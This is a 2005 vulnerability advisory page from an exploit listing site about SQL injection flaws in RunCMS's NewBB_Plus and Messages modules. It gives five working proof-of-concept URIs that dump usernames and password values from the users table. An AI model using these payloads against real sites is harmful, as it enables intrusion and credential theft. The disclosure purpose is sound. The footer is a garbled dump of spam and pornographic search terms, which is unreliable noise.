about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities


Title RunCMS NewBB_Plus and Messages Modules Multiple SQL Injection Vulnerabilities
Published 2005-08-22-12:00AM
Updated 2005-08-22-07:51PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team is credited with the discovery of these vulnerabilities.
Vulnerable  RunCMS RunCMS 1.2
RunCMS RunCMS 1.1 A
RunCMS RunCMS 1.1
Not Vulnerable  
Code   No exploit is required.

The following proof of concept URI are available:
http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*
http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2'&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/*&post_id=2&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_pn
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201/*&op=print_sent_pn
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:37:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.nserie Linux 2.6. gumtur www.zhongy w w w cute hot pic se www.oceanb Pornhob /search/ex /administr pure ftpd www.zghjgg deshi sex t874t adtou shalini M.../porta lighthtt pornsexcli iijibojyby Enzo_01 exploit%20 ant rundll32 sexsy baby powerporta download v boollywood Searching naked vedi powerporta Www.Sexgir user agent My Hot Ass Falcon videoporno free sexmo My Hot Ass ipb202.pl www.buyeti powerporta www.mtse8. site:www.o Xxxphotos maxcpm.inf 200 /compo ilch nakid lady wwworldsex Www.indiya